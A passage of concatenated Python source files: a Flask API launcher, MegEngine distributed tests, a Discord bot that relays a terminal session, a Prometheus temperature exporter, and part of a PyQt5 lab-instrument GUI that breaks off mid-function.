| source | python |
|---|---|
__init__.py
|
import logging
import requests
from flask import Flask
from flask_restful import Api
from multiprocessing import Process
import cli
from api.resources import HelloWorld, Shutdown
def create_api(config_name='default'):
app = Flask(__name__)
api = Api(app)
app.config.from_object(cli.api_config)
api.add_resource(HelloWorld, '/')
api.add_resource(Shutdown, '/shutdown')
return app
def start_api(config_name='default'):
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
# log.disabled = True
api_app = create_api()
p = Process(target=api_app.run)
p.start()
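# Poll until the Flask server in the child process accepts connections
# (a ConnectionError simply means it is not up yet).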
while True:
try:
requests.get(cli.api_config.BASE_URL, timeout=0.1)
return
except requests.exceptions.ConnectionError:
pass
def stop_api(config_name='default'):
requests.post(cli.api_config.BASE_URL + '/shutdown')
|
test_distributed.py
|
# -*- coding: utf-8 -*-
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import multiprocessing as mp
import platform
import queue
import numpy as np
import pytest
import megengine as mge
import megengine.distributed as dist
from megengine.core.ops.builtin import CollectiveComm, ParamPackConcat, ParamPackSplit
from megengine.distributed.helper import (
get_device_count_by_fork,
param_pack_concat,
param_pack_split,
)
def _assert_q_empty(q):
try:
res = q.get(timeout=1)
except Exception as e:
assert isinstance(e, queue.Empty)
else:
assert False, "queue is not empty"
def _assert_q_val(q, val):
ret = q.get()
assert ret == val
@pytest.mark.require_ngpu(2)
@pytest.mark.parametrize("backend", ["nccl"])
@pytest.mark.isolated_distributed
def test_init_process_group(backend):
world_size = 2
server = dist.Server()
port = server.py_server_port
def worker(rank):
dist.init_process_group("localhost", port, world_size, rank, rank, backend)
assert dist.is_distributed() == True
assert dist.get_rank() == rank
assert dist.get_world_size() == world_size
assert dist.get_backend() == backend
py_server_addr = dist.get_py_server_addr()
assert py_server_addr[0] == "localhost"
assert py_server_addr[1] == port
mm_server_addr = dist.get_mm_server_addr()
assert mm_server_addr[0] == "localhost"
assert mm_server_addr[1] > 0
assert isinstance(dist.get_client(), dist.Client)
procs = []
for rank in range(world_size):
p = mp.Process(target=worker, args=(rank,))
p.start()
procs.append(p)
for p in procs:
p.join(20)
assert p.exitcode == 0
@pytest.mark.require_ngpu(3)
@pytest.mark.isolated_distributed
def test_new_group():
world_size = 3
ranks = [2, 0]
@dist.launcher
def worker():
rank = dist.get_rank()
if rank in ranks:
group = dist.new_group(ranks)
assert group.size == 2
assert group.key == "2,0"
assert group.rank == ranks.index(rank)
assert group.comp_node == "gpu{}:2".format(rank)
worker()
@pytest.mark.require_ngpu(2)
@pytest.mark.isolated_distributed
def test_group_barrier():
world_size = 2
server = dist.Server()
port = server.py_server_port
def worker(rank, q):
dist.init_process_group("localhost", port, world_size, rank, rank)
dist.group_barrier()
if rank == 0:
dist.group_barrier()
q.put(0) # to be observed in rank 1
else:
_assert_q_empty(q) # q.put(0) is not executed in rank 0
dist.group_barrier()
_assert_q_val(q, 0) # q.put(0) executed in rank 0
Q = mp.Queue()
procs = []
for rank in range(world_size):
p = mp.Process(target=worker, args=(rank, Q))
p.start()
procs.append(p)
for p in procs:
p.join(20)
assert p.exitcode == 0
@pytest.mark.require_ngpu(2)
@pytest.mark.isolated_distributed
def test_synchronized():
world_size = 2
server = dist.Server()
port = server.py_server_port
@dist.synchronized
def func(rank, q):
q.put(rank)
def worker(rank, q):
dist.init_process_group("localhost", port, world_size, rank, rank)
dist.group_barrier()
if rank == 0:
func(0, q) # q.put(0)
q.put(2)
else:
_assert_q_val(q, 0) # func executed in rank 0
_assert_q_empty(q) # q.put(2) is not executed
func(1, q)
_assert_q_val(
q, 1
) # func in rank 1 executed earlier than q.put(2) in rank 0
_assert_q_val(q, 2) # q.put(2) executed in rank 0
Q = mp.Queue()
procs = []
for rank in range(world_size):
p = mp.Process(target=worker, args=(rank, Q))
p.start()
procs.append(p)
for p in procs:
p.join(20)
assert p.exitcode == 0
@pytest.mark.require_ngpu(2)
@pytest.mark.isolated_distributed
def test_user_set_get():
@dist.launcher
def worker():
# set in race condition
dist.get_client().user_set("foo", 1)
# get in race condition
ret = dist.get_client().user_get("foo")
assert ret == 1
worker()
def test_oprmm_hashable():
lhs = (CollectiveComm(), ParamPackConcat(), ParamPackSplit())
rhs = (CollectiveComm(), ParamPackConcat(), ParamPackSplit())
assert lhs == rhs
assert hash(lhs) == hash(rhs)
def test_param_pack_split():
a = mge.Tensor(np.ones((10,), np.int32))
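# offsets [0, 1, 1, 10] are (start, end) pairs: b = a[0:1] with shape (1,), c = a[1:10] reshaped to (3, 3)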
b, c = param_pack_split(a, [0, 1, 1, 10], [(1,), (3, 3)])
assert np.allclose(b.numpy(), a.numpy()[1])
assert np.allclose(c.numpy(), a.numpy()[1:].reshape(3, 3))
def test_param_pack_concat():
a = mge.Tensor(np.ones((1,), np.int32))
b = mge.Tensor(np.ones((3, 3), np.int32))
offsets_val = [0, 1, 1, 10]
offsets = mge.Tensor(offsets_val, np.int32)
c = param_pack_concat([a, b], offsets, offsets_val)
assert np.allclose(np.concatenate([a.numpy(), b.numpy().flatten()]), c.numpy())
@pytest.mark.require_ngpu(2)
@pytest.mark.parametrize("early_return", [False, True], ids=["common", "early_return"])
@pytest.mark.isolated_distributed
def test_collect_results(early_return):
@dist.launcher
def worker():
if early_return:
exit(0)
return (dist.get_rank(), dist.get_world_size())
results = worker()
world_size = len(results)
assert world_size > 0
expects = (
[None] * world_size
if early_return
else [(dev, world_size) for dev in range(world_size)]
)
assert results == expects
|
bash.py
|
# -*- coding: utf-8 -*-
import asyncio
import os
import sys
import threading
import pyte
from bashbot import bot
class BashSession:
def __init__(self, terminal):
self.name = None
self.description = None
self.status = "dead"
self.controls = None
self.message = None
self.discord_client = None
self.fd = None
self.terminal = terminal
self.stream = pyte.ByteStream(self.terminal)
self.last_output = None
self.new_update = True
def open(self, loop):
pid, self.fd = os.forkpty()
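# Child process (pid == 0): exec a shell, optionally through su as the configured user.
# The parent keeps the pty file descriptor for I/O.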
if pid == 0:
if bot.settings.get("user") and "login" in bot.settings.get("user") and bot.settings.get("user")["login"]:
os.execv(bot.settings.get("terminal")["su_path"],
[bot.settings.get("terminal")["su_path"], "-", bot.settings.get("user")["login"], "-s", bot.settings.get("terminal")["shell_path"]])
else:
os.execv(bot.settings.get("terminal")["shell_path"], [bot.settings.get("terminal")["shell_path"], ])
sys.exit(0)
else:
self.status = "working"
pty_output = threading.Thread(target=self.watch_output)
pty_output.start()
self.update_output(loop)
return self
def close(self):
os.close(self.fd)
print("Closed session #%s @ %s[%s]" % (self.name, self.message.channel.name, (
self.message.channel.server.name if hasattr(self.message.channel, "server") else "PM")))
def send_input(self, data):
try:
os.write(self.fd, self.replace_shortcuts(data).encode("utf-8"))
except OSError:
self.status = "broken"
return
@staticmethod
def replace_shortcuts(command):
d = {
'[UP]': u'\u001b[A',
'[DOWN]': u'\u001b[B',
'[LEFT]': u'\u001b[D',
'[RIGHT]': u'\u001b[C',
'[ESC]': u'\u001b',
'[TAB]': u'\u0009',
'[T]': u'\u0009',
'[F1]': u'\u001bOP',
'[F2]': u'\u001bOQ',
'[F3]': u'\u001bOR',
'[F4]': u'\u001bOS',
'[F5]': u'\u001b[15~',
'[F6]': '',
'[F7]': u'\u001b[18~',
'[F8]': u'\u001b[19~',
'[F9]': u'\u001b[20~',
'[F10]': u'\u001b[21~',
'[F11]': u'\u001b[23~\u001b',
'[F12]': u'\u001b[24~\u0008',
'[<]': u'\u001b\u0005\u0015', # ^E^U Clears input line
'<ESC>': u'\u001b',
'\\a': '\a',
'\\b': '\b',
'\\f': '\f',
'\\n': '\n',
'\\r': '\r',
'\\t': '\t',
'\\v': '\v'
}
d = {**d, **bot.settings.get("custom_shortcuts")}
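# Translate "^X" sequences into control characters: the index in ctrl_chars equals the character code (^@ = 0, ^A = 1, ...).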
ctrl_chars = "@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_"
for char in ctrl_chars:
command = command.replace("^" + char, str(chr(ctrl_chars.index(char))))
for initial, to in d.items():
command = command.replace(initial, to)
return command
def update_output(self, loop):
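# Re-arm a timer so the rendered terminal is pushed to the Discord message at the configured refresh interval.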
update_output = threading.Timer(
int(bot.settings.get("terminal")["refresh"]),
self.update_output,
args=(loop,))
update_output.start()
if not self.last_output:
return
if self.status != "frozen" and self.new_update:
self.send_output(loop)
self.new_update = False
if self.status == "broken":
update_output.join()
def send_output(self, loop):
updated_message = bot.settings.get("terminal_template") % (
self.name,
self.status.title(),
self.last_output)
asyncio.set_event_loop(loop)
asyncio.run_coroutine_threadsafe(
self.discord_client.edit_message(
self.message, updated_message),
loop
)
self.message.content = updated_message
def watch_output(self):
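# Background thread: block on the pty, feed the bytes to pyte and keep last_output in sync with the screen.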
try:
output = os.read(self.fd, 1024)
# Send init input when ready
if bot.settings.get("user") and bot.settings.get("user")["password"]:
self.send_input(bot.settings.get("user")["password"] + "\n") # Login via su
# Set init variables
self.send_input("\n".join(bot.settings.get("terminal")["init"]) + "\n")
except OSError:
self.status = "broken"
return
while output:
self.stream.feed(output.replace(b"(B", b""))
message = "\n".join(self.terminal.display)
self.last_output = message.replace("```", "'''")
if bot.settings.get("show_cursor") == "true":
characters = list(message)
characters[self.terminal.cursor.y * message.index("\n") + self.terminal.cursor.x] = "█"
self.last_output = "".join(characters)
self.new_update = True
try:
output = os.read(self.fd, 1024)
except OSError:
self.status = "broken"
return
|
__init__.py
|
import argparse
import ipaddress
import functools
import os
import signal
import sys
import threading
import wsgiref.simple_server
import prometheus_client
import prometheus_client.core as core
import pyudev
from . import exporter
from . import temper
from . import wsgiext
def main():
'''
You are here.
'''
parser = argparse.ArgumentParser()
parser.add_argument('--bind-address', type=ipaddress.ip_address, default='::', help='IPv6 or IPv4 address to listen on')
parser.add_argument('--bind-port', type=int, default=9204, help='Port to listen on')
parser.add_argument('--bind-v6only', type=int, choices=[0, 1], help='If 1, prevent IPv6 sockets from accepting IPv4 connections; if 0, allow; if unspecified, use OS default')
parser.add_argument('--thread-count', type=int, help='Number of request-handling threads to spawn')
args = parser.parse_args()
class MyCollector(exporter.Collector):
def class_for_device(self, device):
return temper.matcher.match(device)
collector = MyCollector()
core.REGISTRY.register(collector)
server = wsgiext.Server((str(args.bind_address), args.bind_port), max_threads=args.thread_count, bind_v6only=args.bind_v6only)
server.set_app(prometheus_client.make_wsgi_app())
wsgi_thread = threading.Thread(target=functools.partial(server.serve_forever, poll_interval=86400), name='wsgi')
ctx = pyudev.Context()
mon = temper.monitor(ctx)
observer_thread = pyudev.MonitorObserver(mon, name='monitor', callback=collector.handle_device_event)
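# Health watchdog: checks the collector and server every 30 seconds and SIGTERMs the process if either reports unhealthy.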
health_thread = Health([collector, server], 30)
def handle_sigterm(signum, frame):
health_thread.send_stop()
server.send_stop()
observer_thread.send_stop()
signal.signal(signal.SIGTERM, handle_sigterm)
wsgi_thread.start()
observer_thread.start()
health_thread.start()
collector.coldplug_scan(temper.list_devices(ctx))
wsgi_thread.join()
observer_thread.join()
health_thread.join()
server.server_close()
sys.exit(health_thread.exit_status)
class Health(threading.Thread):
def __init__(self, components, interval):
super().__init__(name='health')
self.__components = tuple(components)  # keep a reusable sequence; a generator would be exhausted after the first health check
self.__interval = interval
self.__event = threading.Event()
self.exit_status = 0
def send_stop(self):
'''
Cause the thread to exit.
'''
self.__event.set()
def run(self):
'''
Monitor the health of the service.
If something fails, sends SIGTERM to the process. The signal handler
(which always runs in the main thread) will shut down the components
and then the process will exit.
We don't have to provide detailed error messages, since the component
that failed should already have logged something useful.
'''
try:
while not self.__event.wait(self.__interval):
if not self.__healthy():
self.exit_status = 1
return
finally:
if self.exit_status != 0:
os.kill(os.getpid(), signal.SIGTERM)
def __healthy(self):
try:
return all(component.healthy() for component in self.__components)
except Exception:
return False
|
main_window.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import atexit
import os
import sys
import time
import json
import logging
import signal
import socket
import threading
import configparser
import platform
#from tkinter import filedialog#, ttk
#import tkinter
import numpy as np
from . import widgets
import pyqtgraph as pg
from datetime import datetime
#import OpenGL
from PyQt5.QtCore import QSharedMemory, QSize
from PyQt5.QtGui import QColor, QIcon, QStandardItem, QStandardItemModel
from PyQt5.QtWidgets import QFileDialog, QMessageBox, QListView, QDockWidget, QVBoxLayout, QAction
from PyQt5.QtNetwork import QLocalServer
from PyQt5 import QtWidgets, uic, QtCore, QtGui
from PyQt5.Qt import Qt as QtConst
from pyqtgraph.dockarea import DockArea
import atomize.main.messenger_socket_server as socket_server
###AWG
sys.path.append('/home/pulseepr/Sources/AWG/Examples/python')
sys.path.append('/home/anatoly/AWG/spcm_examples/python')
from pyspcm import *
from spcm_tools import *
class MainWindow(QtWidgets.QMainWindow):
"""
A main window class.
"""
def __init__(self, *args, **kwargs):
"""
A function for connecting actions and creating a main window.
"""
super(MainWindow, self).__init__(*args, **kwargs)
# absolute path to icon:
self.path_to_main = os.path.abspath(os.getcwd())
self.icon_path = os.path.join(self.path_to_main,'atomize/main','Icon.png')
self.setWindowIcon(QIcon(self.icon_path))
#self.destroyed.connect(MainWindow._on_destroyed) # connect some actions to exit
self.destroyed.connect(lambda: self._on_destroyed()) # connect some actions to exit
# Load the UI Page
uic.loadUi('atomize/main/gui/main_window.ui', self) # Design file
# important attributes
if len(sys.argv) > 1 and sys.argv[1] != '': # for bash option
self.script = sys.argv[1]
self.open_file( self.script )
elif len(sys.argv) == 1:
self.script = '' # for not opened script
self.test_flag = 0 # flag for not running script if test is failed
self.flag_opened_script_changed = 0 # flag for saving changes in the opened script
self.path = os.path.join(self.path_to_main,'atomize/tests')
# Connection of different action to different Menus and Buttons
self.tabwidget.tabBar().setTabTextColor(0, QColor(193, 202, 227))
self.tabwidget.tabBar().setTabTextColor(1, QColor(193, 202, 227))
self.tabwidget.tabBar().setTabTextColor(2, QColor(193, 202, 227))
self.button_open.clicked.connect(self.open_file_dialog)
self.button_open.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_edit.clicked.connect(self.edit_file)
self.button_edit.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_test.clicked.connect(self.test)
self.button_test.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_reload.clicked.connect(self.reload)
self.button_reload.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227); }\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_start.clicked.connect(self.start_experiment)
self.button_start.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); border-style: inset}")
self.button_help.clicked.connect(self.help)
self.button_help.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); border-style: inset}")
self.button_quit.clicked.connect(lambda: self.quit())
self.button_quit.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); border-style: inset}")
self.textEdit.setStyleSheet("QPlainTextEdit {background-color: rgb(42, 42, 64); color: rgb(211, 194, 78); }\
QScrollBar:vertical {background-color: rgb(42, 42, 64);}")
# show spaces
option = QtGui.QTextOption()
option.setFlags( QtGui.QTextOption.ShowTabsAndSpaces ) # | QtGui.QTextOption.ShowLineAndParagraphSeparators
self.textEdit.document().setDefaultTextOption(option)
self.textEdit.textChanged.connect(self.save_edited_text)
# set tab distance
self.textEdit.setTabStopDistance( QtGui.QFontMetricsF(self.textEdit.font()).horizontalAdvance(' ') * 4 )
#self.textEdit.setTabStopWidth( 20 )
self.text_errors.top_margin = 2
self.text_errors.setCenterOnScroll(True)
self.text_errors.ensureCursorVisible()
self.text_errors.setContextMenuPolicy(QtConst.ActionsContextMenu)
self.text_errors.setStyleSheet("QPlainTextEdit {background-color: rgb(42, 42, 64); color: rgb(211, 194, 78); } \
QMenu::item { color: rgb(211, 194, 78); } QMenu::item:selected {color: rgb(193, 202, 227); }")
clear_action = QAction('Clear', self.text_errors)
clear_action.triggered.connect(self.clear_errors)
self.text_errors.addAction(clear_action)
# Control Window tab setting
self.tab_control.setStyleSheet("background-color: rgb(42, 42, 64); color: rgb(211, 194, 78); ")
self.button_osc.clicked.connect(self.start_osc_control)
self.button_osc.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_dig.clicked.connect(self.start_dig_control)
self.button_dig.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_mw.clicked.connect(self.start_mw_control)
self.button_mw.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_temp.clicked.connect(self.start_temp_control)
self.button_temp.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_pulse.clicked.connect(self.start_pulse_control)
self.button_pulse.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_awg.clicked.connect(self.start_awg_control)
self.button_awg.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_phasing.clicked.connect(self.start_phasing)
self.button_phasing.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_awg_phasing.clicked.connect(self.start_awg_phasing)
self.button_awg_phasing.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.fft_analyzer.clicked.connect(self.start_fft_control)
self.fft_analyzer.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_t2.clicked.connect(self.start_t2_preset)
self.button_t2.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_t1.clicked.connect(self.start_t1_preset)
self.button_t1.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_echo.clicked.connect(self.start_echo_preset)
self.button_echo.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_eseem.clicked.connect(self.start_eseem_preset)
self.button_eseem.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_tune.clicked.connect(self.start_tune_preset)
self.button_tune.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.button_laser.clicked.connect(self.start_laser_preset)
self.button_laser.setStyleSheet("QPushButton {border-radius: 4px; background-color: rgb(63, 63, 97);\
border-style: outset; color: rgb(193, 202, 227);}\
QPushButton:pressed {background-color: rgb(211, 194, 78); ; border-style: inset}")
self.label_creator.setStyleSheet("QLabel { color : rgb(193, 202, 227); }")
self.label.setStyleSheet("QLabel { color : rgb(193, 202, 227); }")
self.label_filename.setStyleSheet("QLabel { color : rgb(193, 202, 227); }")
self.script_chooser.setStyleSheet("QComboBox { color : rgb(193, 202, 227); selection-color: rgb(211, 194, 78); }")
self.script_chooser.currentIndexChanged.connect(self.script_open_combo)
self.script = self.text_to_script_name( self.script_chooser.currentText() )
# preopen script
self.open_file( self.script )
self.checkTests.setStyleSheet("QCheckBox { color : rgb(193, 202, 227); }")
# Liveplot tab setting
self.dockarea = DockArea()
self.namelist = NameList(self)
self.tab_liveplot.setStyleSheet("background-color: rgb(42, 42, 64); color: rgb(211, 194, 78); ")
self.gridLayout_tab_liveplot.setColumnMinimumWidth(0, 200)
self.gridLayout_tab_liveplot.setColumnStretch(1, 2000)
self.gridLayout_tab_liveplot.addWidget(self.namelist, 0, 0)
self.gridLayout_tab_liveplot.setAlignment(self.namelist, QtConst.AlignLeft)
self.gridLayout_tab_liveplot.addWidget(self.dockarea, 0, 1)
#self.gridLayout_tab_liveplot.setAlignment(self.dockarea, QtConst.AlignRight)
self.namelist.setStyleSheet("background-color: rgb(42, 42, 64); color: rgb(211, 194, 78); border: 2px solid rgb(40, 30, 45)")
self.namelist.namelist_view.setStyleSheet("QListView::item:selected:active {background-color: rgb(63, 63, 97);\
color: rgb(211, 194, 78); } QListView::item:hover {background-color: rgb(48, 48, 75); }")
self.namelist.namelist_view.setStyleSheet("QMenu::item:selected {background-color: rgb(48, 48, 75); }")
# Liveplot server settings
self.server = QLocalServer()
self.server.removeServer('LivePlot')
self.server.listen('LivePlot')
self.server.newConnection.connect(self.accept)
self.bytes = bytearray()
self.target_size = 0
self.meta = None
self.insert_dock_right = True
self.conns = []
self.shared_mems = []
signal.signal(signal.SIGINT, self.close)
# configuration data
path_config_file = os.path.join(self.path_to_main,'atomize/config.ini')
config = configparser.ConfigParser()
config.read(path_config_file)
# directories
self.open_dir = str(config['DEFAULT']['open_dir'])
self.script_dir = str(config['DEFAULT']['script_dir'])
self.path = self.script_dir
self.test_timeout = int(config['DEFAULT']['test_timeout']) * 1000 # in ms
# for running different processes using QProcess
self.process = QtCore.QProcess(self)
self.process_text_editor = QtCore.QProcess(self)
self.process_python = QtCore.QProcess(self)
self.process_pulse = QtCore.QProcess(self)
self.process_osc = QtCore.QProcess(self)
self.process_dig = QtCore.QProcess(self)
self.process_mw = QtCore.QProcess(self)
self.process_temp = QtCore.QProcess(self)
self.process_t2 = QtCore.QProcess(self)
self.process_t1 = QtCore.QProcess(self)
self.process_echo = QtCore.QProcess(self)
self.process_laser = QtCore.QProcess(self)
self.process_eseem = QtCore.QProcess(self)
self.process_tune = QtCore.QProcess(self)
self.process_awg = QtCore.QProcess(self)
self.process_fft = QtCore.QProcess(self)
self.process_phasing = QtCore.QProcess(self)
self.process_awg_phasing = QtCore.QProcess(self)
# check where we are
self.system = platform.system()
if self.system == 'Windows':
self.process_text_editor.setProgram(str(config['DEFAULT']['editorW']))
self.process.setProgram('python.exe')
self.process_python.setProgram('python.exe')
self.process_pulse.setProgram('python.exe')
self.process_osc.setProgram('python.exe')
self.process_dig.setProgram('python.exe')
self.process_mw.setProgram('python.exe')
self.process_temp.setProgram('python.exe')
self.process_t2.setProgram('python.exe')
self.process_t1.setProgram('python.exe')
self.process_echo.setProgram('python.exe')
self.process_laser.setProgram('python.exe')
self.process_eseem.setProgram('python.exe')
self.process_tune.setProgram('python.exe')
self.process_awg.setProgram('python.exe')
self.process_fft.setProgram('python.exe')
self.process_phasing.setProgram('python.exe')
self.process_awg_phasing.setProgram('python.exe')
elif self.system == 'Linux':
self.editor = str(config['DEFAULT']['editor'])
if self.editor == 'nano' or self.editor == 'vi':
self.process_text_editor.setProgram('xterm')
else:
self.process_text_editor.setProgram(str(config['DEFAULT']['editor']))
self.process.setProgram('python3')
self.process_python.setProgram('python3')
self.process_pulse.setProgram('python3')
self.process_osc.setProgram('python3')
self.process_dig.setProgram('python3')
self.process_mw.setProgram('python3')
self.process_temp.setProgram('python3')
self.process_t2.setProgram('python3')
self.process_t1.setProgram('python3')
self.process_echo.setProgram('python3')
self.process_laser.setProgram('python3')
self.process_eseem.setProgram('python3')
self.process_tune.setProgram('python3')
self.process_awg.setProgram('python3')
self.process_fft.setProgram('python3')
self.process_phasing.setProgram('python3')
self.process_awg_phasing.setProgram('python3')
self.process.finished.connect(self.on_finished_checking)
self.process_python.finished.connect(self.on_finished_script)
############################################## Liveplot Functions
def close(self, sig = None, frame = None):
#print('closing')
for conn in self.conns:
conn.close()
for shm in self.shared_mems:
shm.detach()
self._on_destroyed()
#QApplication.instance().exit()
def accept(self):
logging.debug('connection accepted')
conn = self.server.nextPendingConnection()
conn.waitForReadyRead()
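# The client first sends a 36-byte key identifying the QSharedMemory segment that holds the plot data.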
key = str(conn.read(36).decode())
memory = QSharedMemory()
memory.setKey(key)
memory.attach()
logging.debug('attached to memory %s with size %s'%(key, memory.size()))
#11-04-2021; Should be uncommented in case of problems
#atexit.register(memory.detach)
self.conns.append(conn)
self.shared_mems.append(memory)
conn.readyRead.connect(lambda: self.read_from(conn, memory))
conn.disconnected.connect(memory.detach)
conn.write(b'ok')
# noinspection PyNoneFunctionAssignment
def read_from(self, conn, memory):
logging.debug('reading data')
self.meta = json.loads(conn.read(300).decode())
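# Metadata (operation, plot name, dtype, shape, array size) arrives as JSON; the array itself is copied out of shared memory below.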
if self.meta['arrsize'] != 0:
memory.lock()
raw_data = memory.data()
if raw_data is not None:
ba = raw_data[:self.meta['arrsize']]
arr = np.frombuffer(memoryview(ba), dtype=self.meta['dtype'])
memory.unlock()
conn.write(b'ok')
arr = arr.reshape(self.meta['shape']).copy()
else:
arr = None
else:
arr = None
self.do_operation(arr)
if conn.bytesAvailable():
self.read_from(conn, memory)
def do_operation(self, arr = None):
def clear(name):
self.namelist[name].clear()
def close(name):
self.namelist[name].close()
def remove(name):
del self.namelist[name]
meta = self.meta
operation = meta['operation']
name = meta['name']
if name in self.namelist:
pw = self.namelist[name]
if pw.closed:
pw.closed = False
self.dockarea.addDock(pw)
elif name == "*":
if operation == 'clear':
list(map(clear, list(self.namelist.keys())))
elif operation == 'close':
list(map(close, list(self.namelist.keys())))
elif operation == 'remove':
list(map(remove, list(self.namelist.keys())))
return
else:
if operation in ('clear', 'close', 'remove','none'):
return
pw = self.add_new_plot(meta['rank'], name)
if operation == 'clear':
pw.clear()
elif operation == 'close':
pw.close()
elif operation == 'none':
pass
elif operation == 'remove':
del self.namelist[name]
elif operation == 'plot_y':
start_step = meta['start_step']
label = meta['label']
if start_step is not None:
x0, dx = start_step
nx = len(arr)
xs = np.linspace(x0, x0 + (nx - 1)*dx, nx)
pw.plot(xs, arr, name=label, scatter='False')
else:
pw.plot(arr, name=label, scatter='False')
elif operation == 'plot_xy':
label = meta['label']
xnam = meta['Xname']
xscal = meta['X']
ynam = meta['Yname']
yscal = meta['Y']
scat = meta['Scatter']
taxis = meta['TimeAxis']
verline = meta['Vline']
tex = meta['value']
pw.plot(arr[0], arr[1], parametric=True, name=label, xname=xnam, xscale =xscal,\
yname=ynam, yscale =yscal, scatter=scat, timeaxis=taxis, vline=verline, text=tex)
elif operation == 'plot_z':
start_step = meta['start_step']
xnam = meta['Xname']
xscal = meta['X']
ynam = meta['Yname']
yscal = meta['Y']
znam = meta['Zname']
zscal = meta['Z']
tex = meta['value']
if start_step is not None:
(x0, dx), (y0, dy) = start_step
pw.setAxisLabels(xname=xnam, xscale =xscal, yname=ynam, yscale =yscal,\
zname=znam, zscale =zscal)
pw.setImage(arr, pos=(x0, y0), scale=(dx, dy)) #, axes={'y':0, 'x':1}
# Graph title
if tex != '':
pw.setTitle(meta['value'])
else:
pw.setAxisLabels(xname=xnam, xscale =xscal, yname=ynam, yscale =yscal,\
zname=znam, zscale =zscal)
pw.setImage(arr) #, axes={'y':0, 'x':1}
# Graph title
if tex != '':
pw.setTitle(meta['value'])
elif operation == 'append_y':
label = meta['label']
xnam = meta['Xname']
xscal = meta['X']
ynam = meta['Yname']
yscal = meta['Y']
scat = meta['Scatter']
taxis = meta['TimeAxis']
verline = meta['Vline']
xs, ys = pw.get_data(label)
new_ys = list(ys)
new_ys.append(meta['value'])
start_step = meta['start_step']
if start_step is not None:
x0, dx = start_step
nx = len(new_ys)
xs = np.linspace(x0, x0 + (nx - 1)*dx, nx)
pw.plot(xs, new_ys, name=label, xname=xnam, xscale =xscal, yname=ynam,\
yscale =yscal, scatter=scat, timeaxis=taxis, vline=verline)
else:
pw.plot(new_ys, name=label, xname=xnam, xscale =xscal, yname=ynam,\
